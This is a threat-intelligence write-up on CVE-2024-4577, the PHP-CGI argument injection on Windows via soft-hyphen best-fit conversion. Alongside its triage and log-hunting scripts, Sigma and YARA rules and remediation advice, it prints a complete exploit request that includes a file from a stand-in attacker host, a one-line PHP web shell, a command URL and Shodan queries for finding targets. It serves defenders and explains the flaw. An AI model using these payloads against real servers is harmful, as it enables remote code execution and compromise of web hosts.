CVE Deep Dive
CVSS 9.8 · 3 sources verified · 5 min read
By Lyrie Threat Intelligence · 4/25/2026

CVE-2024-4577: PHP-CGI RCE via Windows Best-Fit Character Conversion

CVSS 9.8 (CRITICAL) | PHP CGI (Windows) | Argument Injection via Soft Hyphen (0xAD) → RCE

Executive Summary

CVE-2024-4577 is a critical argument injection vulnerability affecting PHP running in CGI mode on Windows systems with specific locale configurations (Japanese, Traditional Chinese, Simplified Chinese). By exploiting Windows "Best-Fit" character conversion, attackers can inject the soft hyphen character (0xAD), which Windows converts to a regular hyphen (-), bypassing PHP's argument sanitization and enabling remote code execution via the allow_url_include and auto_prepend_file directives.

Key Facts:

  • Attack vector: Single HTTP request with crafted query parameter
  • Authentication required: None
  • CISA KEV status: Added to Known Exploited Vulnerabilities (actively exploited)
  • Public PoCs: Multiple, including Metasploit module
  • Affected locales: Japanese, Traditional Chinese, Simplified Chinese Windows installations

Vulnerability Mechanics

PHP-CGI on Windows uses GetCommandLine() to parse HTTP query strings into PHP arguments. The vulnerability chain:

1. Soft Hyphen Injection

The attacker sends an HTTP request with %ADd (soft hyphen followed by 'd') in a query parameter

2. Windows Best-Fit Conversion

Windows converts 0xAD (soft hyphen) → - (regular hyphen) in the Japanese, Simplified Chinese and Traditional Chinese code pages

3. PHP Argument Injection

The resulting -d sequence is interpreted as a PHP CLI argument, allowing the attacker to set arbitrary PHP directives

4. allow_url_include + auto_prepend_file

Attacker injects:

-d allow_url_include=1 -d auto_prepend_file=http://attacker.com/shell.txt

5. Remote Code Execution

PHP includes and executes the attacker-controlled remote file as PHP code

Root Cause: Windows Best-Fit character mapping (locale-specific encoding normalization) bypasses PHP's argument sanitization, which only checks for the standard ASCII hyphen[^1].

Attack Surface

Affected Versions

  • PHP 8.3.0 - 8.3.7 (CGI mode on Windows)
  • PHP 8.2.0 - 8.2.19 (CGI mode on Windows)
  • PHP 8.1.0 - 8.1.28 (CGI mode on Windows)

Patched in: PHP 8.3.8, 8.2.20, 8.1.29

Prerequisites

  • PHP-CGI mode (not PHP-FPM, not mod_php, not CLI)
  • Windows OS with Japanese, Traditional Chinese, or Simplified Chinese locale
  • Best-Fit character conversion enabled (default on affected locales)
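A triage helper that combines the version table and the prerequisites just listed, as an added Python example (not from the Lyrie write-up). It assumes the Windows ANSI code page numbers 932, 936 and 950 for the Japanese, Simplified Chinese and Traditional Chinese locales, and that php-cgi.exe reports PHP_SAPI as "cgi-fcgi"; neither value is on the page. Branches older than 8.1 are not in the advisory's version table, so the helper flags them for review rather than guessing.

```python
"""Exposure triage for CVE-2024-4577 (added example, not from the Lyrie write-up).

Combines the three conditions listed above: a PHP version inside an affected
range, the CGI SAPI, and a Windows system code page whose best-fit table maps
U+00AD to '-'. The version table comes from the "Affected Versions" and
"Patched in" lines; the code page numbers and the SAPI names are assumptions
(Windows ANSI code page identifiers; php-cgi.exe reporting PHP_SAPI "cgi-fcgi").
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# First fixed release per branch, from the "Patched in" line above.
FIXED = {(8, 3): (8, 3, 8), (8, 2): (8, 2, 20), (8, 1): (8, 1, 29)}
OLDEST_LISTED_BRANCH = (8, 1)

# Windows ANSI code pages for the affected locales (assumed mapping, see above).
AFFECTED_CODEPAGES = {932: "Japanese", 936: "Simplified Chinese", 950: "Traditional Chinese"}

# PHP_SAPI values that mean "running as CGI" (assumption noted above).
CGI_SAPIS = {"cgi", "cgi-fcgi"}


def parse_version(text: str) -> tuple[int, int, int]:
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError(f"unrecognised PHP version string: {text!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def version_state(text: str) -> str:
    """'affected', 'patched', or 'outside_listed_ranges' for branches older than 8.1."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED:
        return "patched" if v >= FIXED[branch] else "affected"
    if branch < OLDEST_LISTED_BRANCH:
        return "outside_listed_ranges"
    return "patched"  # a branch newer than 8.3 post-dates the fix


@dataclass
class Host:
    php_version: str  # e.g. taken from `php-cgi -v`
    sapi: str         # PHP_SAPI value
    acp: int          # system ANSI code page, e.g. GetACP() on Windows
    os: str = "windows"


def assess(host: Host) -> dict:
    """Return a verdict plus the reasons that support it."""
    blockers = []  # any one of these breaks the exploit chain described above
    if host.os.lower() != "windows":
        blockers.append("not a Windows host")
    if host.sapi.lower() not in CGI_SAPIS:
        blockers.append(f"SAPI {host.sapi!r} is not CGI")
    if host.acp not in AFFECTED_CODEPAGES:
        blockers.append(f"code page {host.acp} is not one of the affected locales")
    state = version_state(host.php_version)
    if state == "patched":
        blockers.append(f"PHP {host.php_version} is at or above the fixed release")
    if blockers:
        return {"verdict": "not_vulnerable", "reasons": blockers}
    if state == "outside_listed_ranges":
        return {"verdict": "review",
                "reasons": [f"PHP {host.php_version} is older than the branches the advisory "
                            "lists; treat as unpatched until verified"]}
    return {"verdict": "vulnerable",
            "reasons": [f"PHP {host.php_version} in affected range, CGI SAPI, "
                        f"{AFFECTED_CODEPAGES[host.acp]} code page {host.acp}"]}


if __name__ == "__main__":
    for h in (Host("8.2.19", "cgi-fcgi", 932), Host("8.2.20", "cgi-fcgi", 932),
              Host("8.3.7", "fpm-fcgi", 950)):
        print(h, "->", assess(h))
```

Feed it inventory data (PHP version, SAPI and system code page per host) and it separates hosts that are exploitable from hosts where one link of the chain is missing; the "review" verdict is deliberately not "not_vulnerable".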

Attack Vector

GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dhttp://attacker.com/shell.txt HTTP/1.1
Host: target.com

URL decoded (the soft hyphen is non-printing and is shown here as [0xAD]):

/index.php?[0xAD]d allow_url_include=1 [0xAD]d auto_prepend_file=http://attacker.com/shell.txt

Post-Exploitation

The remote shell file (shell.txt) contains PHP code executed in the context of the web server:

<?php system($_GET['cmd']); ?>

Attacker then accesses:

http://target.com/index.php?cmd=whoami

Real-World Exploitation

Exploitation Campaigns

According to Devcore security research, CVE-2024-4577 has been actively exploited since June 2024, shortly after public disclosure[^2]. Targets include:

  • Web hosting providers in APAC region (Japan, Taiwan, China)
  • E-commerce platforms running PHP on Windows/IIS
  • CMS installations (WordPress, Joomla, custom PHP apps) on Windows servers
  • Legacy enterprise applications that cannot migrate from CGI to modern PHP deployment (FastCGI, PHP-FPM)

Exploitation Indicators

  • HTTP GET requests with %AD (soft hyphen) in query parameters
  • Query strings containing: allow_url_include, auto_prepend_file, auto_append_file
  • Remote file inclusion from suspicious external URLs
  • PHP error logs showing "allow_url_include" directive changes

Detection & Response

Network Indicators

  • HTTP requests containing %AD, %adD, %ADd sequences
  • Query parameters with PHP directive names (allow_url_include, auto_prepend_file)
  • Outbound HTTP requests from the web server to external IPs (remote file inclusion)
  • User-Agent patterns associated with automated scanners (Nuclei, sqlmap, custom scripts)

Web Server Logs (IIS/Apache)

200.200.200.200 - - [25/Apr/2026:12:34:56] "GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dhttp://malicious.com/shell.txt HTTP/1.1" 200 -
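The network and log indicators above, applied to access-log lines as an added Python example (not Lyrie's code and not from the detection package mentioned below). The log lines, client addresses and hostnames are constructed for the example; only the request shape mirrors the vector documented above. Decoding is done on bytes so that %AD in any letter case and a raw 0xAD byte in the log are caught alike, and a directive name on its own is reported as suspicious rather than critical, matching the "%AD + directive" pairing the WAF guidance calls for.

```python
"""Hunt web server access logs for CVE-2024-4577 indicators.

Added example for this write-up (not Lyrie's code and not from the detection
package it mentions). The sample log lines, client addresses and hostnames
below are constructed; only the request shape mirrors the vector shown above.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# PHP directives named in the indicators above.
DIRECTIVES = (b"allow_url_include", b"auto_prepend_file", b"auto_append_file")

# Apache combined / IIS-style access log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A 0xAD byte directly followed by an ASCII letter is the shape of an injected
# CGI option ("-d") once best-fit conversion has turned the soft hyphen into '-'.
SOFT_HYPHEN_OPTION = re.compile(rb"\xad[A-Za-z]")


def classify_query(raw_query: str) -> dict:
    """Classify one URL query string.

    Percent-decoding is done to bytes so that %AD in any letter case and a
    literal 0xAD byte in the log are all treated the same way.
    """
    decoded = unquote_to_bytes(raw_query)
    soft_hyphen = SOFT_HYPHEN_OPTION.search(decoded) is not None
    directives = [d.decode() for d in DIRECTIVES if d in decoded.lower()]
    if soft_hyphen and directives:
        verdict = "critical"    # both halves of the exploit shape present
    elif soft_hyphen or directives:
        verdict = "suspicious"  # one half only: triage, do not ignore
    else:
        verdict = "clean"
    return {"verdict": verdict, "soft_hyphen": soft_hyphen, "directives": directives}


def hunt(log_text: str) -> list[dict]:
    """Return one finding per non-clean request line, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this parser understands
        path, _, query = m.group("target").partition("?")
        result = classify_query(query)
        if result["verdict"] != "clean":
            findings.append({"client": m.group("client"), "ts": m.group("ts"),
                             "path": path, **result})
    return findings


# Constructed sample: two exploit-shaped requests (upper- and lower-case
# encoding of the soft hyphen), one benign hit on a directive name, one clean line.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Apr/2026:12:34:56 +0000] "GET /index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dhttp://example.invalid/shell.txt HTTP/1.1" 200 -
203.0.113.11 - - [25/Apr/2026:12:35:01 +0000] "GET /index.php?%add+allow_url_include%3d1+%aDd+auto_prepend_file%3dhttp://example.invalid/x.txt HTTP/1.1" 200 -
198.51.100.7 - - [25/Apr/2026:12:35:09 +0000] "GET /docs.php?topic=allow_url_include HTTP/1.1" 200 -
198.51.100.8 - - [25/Apr/2026:12:35:15 +0000] "GET /index.php?page=home HTTP/1.1" 200 -
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding)
```

Run it over exported IIS or Apache logs; a "critical" finding identifies the client, timestamp and directives so the response team can pivot to outbound-connection and file-system artefacts for that window.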

Sigma Rule

title: CVE-2024-4577 PHP-CGI Argument Injection
status: experimental
description: Detects HTTP requests carrying a URL-encoded soft hyphen (0xAD) together with a PHP directive name in the query string. Sigma string matching is case-insensitive, so '%AD' also covers '%ad'.
logsource:
  category: webserver
detection:
  soft_hyphen:
    cs-uri-query|contains: '%AD'
  directive:
    cs-uri-query|contains:
      - 'allow_url_include'
      - 'auto_prepend_file'
      - 'auto_append_file'
  condition: soft_hyphen and directive
falsepositives:
  - Unknown
level: critical

YARA Rule

rule CVE_2024_4577_Exploit_Traffic {
    strings:
        $soft_hyphen = "%AD" ascii nocase
        $directive1 = "allow_url_include" ascii
        $directive2 = "auto_prepend_file" ascii
        $directive3 = "auto_append_file" ascii
    condition:
        $soft_hyphen and 1 of ($directive*)
}

Full detection package including Suricata/Snort rules and forensic artifacts available in Lyrie's CVE-2024-4577 exploit lab.

Remediation

Immediate Actions

1. Upgrade PHP to 8.3.8, 8.2.20, or 8.1.29 (or later)[^3]

2. Disable CGI mode: Migrate to PHP-FPM (FastCGI) or mod_php if possible

3. Hunt for exploitation: Search web server logs for %AD, allow_url_include, remote file inclusion patterns

4. WAF rules: Block HTTP requests containing %AD + PHP directive names

5. Incident response: If exploitation confirmed, assume full webshell deployment, perform forensics, rebuild from clean backups

Long-Term Mitigation

  • Deprecate PHP-CGI: Modern PHP deployments use FastCGI (PHP-FPM), which is not vulnerable
  • Restrict allow_url_include: Set allow_url_include=0 in php.ini globally (defense-in-depth)
  • Network egress filtering: Block outbound HTTP/HTTPS from web servers to untrusted external IPs
  • Content Security Policy: Prevent execution of remotely included scripts (browser-side defense)

Shodan/Censys Detection

http.server:"PHP" country:"JP,TW,CN" os:"Windows"
http.component:"php-cgi"

Lyrie Verdict

Threat Level: HIGH

CVE-2024-4577 represents a classic case of locale-specific vulnerability — a security flaw that only manifests under specific regional configurations:

  • Locale dependency: only affects Japanese/Chinese Windows installations
  • Character encoding attack: exploits OS-level character normalization
  • Bypass via non-ASCII: circumvents PHP's ASCII-based sanitization
  • Active exploitation: CISA KEV, Metasploit module, scanner integration
  • Legacy deployment pattern: PHP-CGI still common in enterprise Windows environments

The Locale Blind Spot:

Western security teams often overlook locale-specific vulnerabilities during testing. Penetration tests performed on English/US-configured systems will not detect CVE-2024-4577, creating a false sense of security for APAC deployments.

This vulnerability demonstrates why internationalization (i18n) must be a first-class security concern:

  • Character encoding attacks (UTF-7 XSS, Best-Fit injection, Unicode normalization bypasses)
  • Locale-specific code paths in libraries (collation, sorting, case conversion)
  • Regional compliance frameworks (GDPR, CCPA, China's Cybersecurity Law) driving different security postures

Recommended Posture:

  • Test security controls against all target locales, not just English/US
  • Migrate away from PHP-CGI (deprecated in favor of FastCGI since PHP 5.4)
  • Implement defense-in-depth: WAF rules + PHP hardening + network egress filtering
  • Assume any Japanese/Chinese/Traditional Chinese Windows + PHP-CGI installation is vulnerable until proven patched

Organizations running PHP-CGI on Windows in APAC markets should treat this as an immediate critical incident requiring emergency patching.


References

[^1]: Devcore Security Research: CVE-2024-4577 - PHP CGI Argument Injection Analysis

[^2]: PHP Bug Report: Bug #74544 - argv/argc handling in PHP-CGI

[^3]: PHP Releases: PHP 8.3.8 Security Update



Last Updated: April 26, 2026

Lyrie Verdict

A vulnerability of this severity is exactly what Lyrie's anti-rogue-AI defense is built for: continuous, autonomous monitoring that doesn't wait for human reaction time.

Validated sources

  1. NIST NVD
  2. MITRE CVE
  3. Lyrie Research Lab